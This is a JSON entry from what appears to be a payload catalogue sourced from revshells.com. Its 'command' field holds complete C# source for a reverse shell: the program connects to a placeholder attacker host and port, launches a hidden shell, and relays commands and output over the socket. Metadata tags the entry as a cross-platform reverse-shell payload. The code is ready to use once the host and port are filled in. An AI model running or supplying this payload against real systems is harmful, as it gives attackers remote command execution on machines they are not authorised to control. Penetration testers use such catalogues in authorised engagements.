{
  "id": "rsg-reverseshell-c-tcp-client",
  "name": "RSG · ReverseShell · C# TCP Client",
  "command": "using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Net;\nusing System.Net.Sockets;\n\n\nnamespace ConnectBack\n{\n\tpublic class Program\n\t{\n\t\tstatic StreamWriter streamWriter;\n\n\t\tpublic static void Main(string[] args)\n\t\t{\n\t\t\tusing(TcpClient client = new TcpClient(\"<lhost>\", <lport>))\n\t\t\t{\n\t\t\t\tusing(Stream stream = client.GetStream())\n\t\t\t\t{\n\t\t\t\t\tusing(StreamReader rdr = new StreamReader(stream))\n\t\t\t\t\t{\n\t\t\t\t\t\tstreamWriter = new StreamWriter(stream);\n\t\t\t\t\t\t\n\t\t\t\t\t\tStringBuilder strInput = new StringBuilder();\n\n\t\t\t\t\t\tProcess p = new Process();\n\t\t\t\t\t\tp.StartInfo.FileName = \"<shell>\";\n\t\t\t\t\t\tp.StartInfo.CreateNoWindow = true;\n\t\t\t\t\t\tp.StartInfo.UseShellExecute = false;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardOutput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardInput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardError = true;\n\t\t\t\t\t\tp.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);\n\t\t\t\t\t\tp.Start();\n\t\t\t\t\t\tp.BeginOutputReadLine();\n\n\t\t\t\t\t\twhile(true)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tstrInput.Append(rdr.ReadLine());\n\t\t\t\t\t\t\t//strInput.Append(\"\\n\");\n\t\t\t\t\t\t\tp.StandardInput.WriteLine(strInput);\n\t\t\t\t\t\t\tstrInput.Remove(0, strInput.Length);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tprivate static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)\n        {\n            StringBuilder strOutput = new StringBuilder();\n\n            if (!String.IsNullOrEmpty(outLine.Data))\n            {\n                try\n                {\n                    strOutput.Append(outLine.Data);\n                    streamWriter.WriteLine(strOutput);\n                    streamWriter.Flush();\n                }\n                catch (Exception err) { }\n            }\n        }\n\n\t}\n}",
  "description": "Reverse Shell payload — C# TCP Client (via reverse-shell-generator).",
  "platform": "cross-platform",
  "tags": [
    "rsg",
    "payload",
    "reverse-shell",
    "linux",
    "windows"
  ],
  "source": "rsg",
  "source_url": "https://www.revshells.com/",
  "upstream_id": "ReverseShell/C# TCP Client/17",
  "category": "payloads",
  "subcategory": "reverse-shell",
  "references": [
    {
      "title": "reverse-shell-generator (revshells.com)",
      "url": "https://www.revshells.com/"
    },
    {
      "title": "reverse-shell-generator GitHub",
      "url": "https://github.com/0dayCTF/reverse-shell-generator"
    }
  ]
}
